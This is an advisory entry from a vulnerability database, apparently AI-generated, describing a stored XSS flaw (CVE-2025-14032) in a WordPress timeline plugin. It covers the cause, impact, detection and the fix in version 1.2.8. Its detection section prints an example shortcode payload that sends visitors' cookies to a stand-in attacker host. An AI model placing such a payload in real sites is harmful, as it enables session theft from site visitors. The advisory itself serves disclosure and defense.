
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-14032 is a Stored Cross-Site Scripting (XSS) vulnerability in the Bold Timeline Lite plugin for WordPress, affecting all versions up to and including 1.2.7. The flaw exists in the title parameter of the bold_timeline_group shortcode due to insufficient input sanitization and output escaping. It was published on December 12, 2025, with the CVE assigned by Wordfence. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), stemming from the plugin's failure to sanitize the title parameter before rendering it in the bold_timeline_group shortcode output. The vulnerable code path is located in assets/views/bold_timeline_group_view.php at line 79, where user-supplied input is echoed without proper escaping. An authenticated attacker with at least Contributor-level access can embed malicious JavaScript in a post or page using the shortcode, which then executes in the browsers of any user who visits the affected page (Wordfence, WordPress Plugin Trac).
Successful exploitation allows persistent JavaScript execution in the context of any site visitor's browser session, enabling session hijacking, credential theft, defacement, or redirection to malicious sites. Because the injected script persists in stored content, all users who view the compromised page are affected — including administrators — potentially enabling privilege escalation or site takeover. Confidentiality and integrity are both impacted (low severity each per CVSS), while availability is not directly affected (Wordfence).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-14032. The EPSS score is approximately 0.03% (0.000300), indicating a very low probability of exploitation in the near term. The vulnerability requires authenticated access at the Contributor level or above, which limits the attack surface. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence).
bold_timeline_group shortcode with a malicious title parameter, e.g., [bold_timeline_group title="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].wp-admin/post.php or REST API endpoints containing bold_timeline_group shortcode with suspicious title values including <script>, javascript:, or encoded variants.<script> tags or JavaScript URIs stored in the wp_posts table within post_content fields associated with the bold_timeline_group shortcode.Users should update the Bold Timeline Lite plugin to version 1.2.8 or later, which addresses the insufficient sanitization of the title parameter. As an interim measure, site administrators can restrict Contributor-level user registration or disable the Bold Timeline Lite plugin until the update is applied. Reviewing existing posts for unexpected <script> tags in bold_timeline_group shortcodes is also recommended (Wordfence, WordPress Plugin).
Wordfence disclosed the vulnerability as part of their weekly WordPress vulnerability report for December 8–14, 2025, noting it as a medium-severity stored XSS issue. No significant broader media coverage or notable researcher commentary beyond the Wordfence advisory has been identified (Wordfence Blog).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."